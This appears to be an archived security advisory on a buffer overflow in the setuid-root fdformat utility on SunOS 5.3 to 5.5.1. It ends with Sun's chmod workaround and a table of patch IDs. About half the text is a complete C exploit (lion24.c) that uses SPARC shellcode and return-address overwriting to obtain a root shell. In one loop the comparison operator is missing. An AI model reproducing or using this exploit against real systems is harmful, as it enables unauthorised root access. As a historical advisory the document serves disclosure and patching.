COMMAND

    /bin/fdformat

SYSTEMS AFFECTED

    SunOS versions 5.3,  5.4, 5.5, 5.5_x86,  5.5.1, and 5.5.1_x86  are
    vulnerable.

PROBLEM

    fdformat(1) is a utility for formatting both diskettes and  PCMCIA
    memory cards.  Due to  insufficient bounds  checking on  arguments
    which  are  supplied  by  users,  it  is possible to overwrite the
    internal  stack  space  of  the  fdformat  program  while  it   is
    executing.   By  supplying  a  carefully  designed argument to the
    fdformat  program,  intruders  may  be  able  to force fdformat to
    execute arbitrary commands.  As fdformat is setuid root, this  may
    allow intruders to run arbitrary commands with root privileges.

    The buffer overflow bug in find_media() posted by Cristian Schipor
    is  present  in  /bin/fdformat  too.  By  exploiting fdformat with
    suid-exec bit on, anyone can gain a  root (or who is the owner  of
    fdformat) shell.  Once again Chris made exploit.

    His exploits (with argv[1] you can change the STACK_OFFSET, +-  x,
    x=8*k k=1,2,3,...):

    ------------------------- lion24.c -------------------------------

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 264
    #define EXTRA 36
    #define STACK_OFFSET -56
    #define SPARC_NOP 0xa61cc013

    u_char sparc_shellcode[] =

    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i  code_length; i++)
    *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
    perror("execl failed");
    }
    -------------------------- end of lion24.c -----------------------

SOLUTION

    Sun  recommends,  as  a  workaround,  that  setuid  permission  be
    removed from  the eject  and fdformat  programs by  using commands
    such as the following:

        chmod 555 /usr/bin/fdformat

    The same vulnerabilities have  been fixed in the  upcoming release
    of Solaris 2.6.  The vulnerabilities relating  to fdformat in  the
    volume management library are fixed by the following patches:

        OS version              Patch ID
        ----------              --------
        SunOS 5.5.1             104776-01
        SunOS 5.5.1_x86         104777-01
        SunOS 5.5               103024-02
        SunOS 5.5_x86           103044-02
        SunOS 5.4               101907-14
        SunOS 5.4_x86           101908-14
        SunOS 5.3               101331-07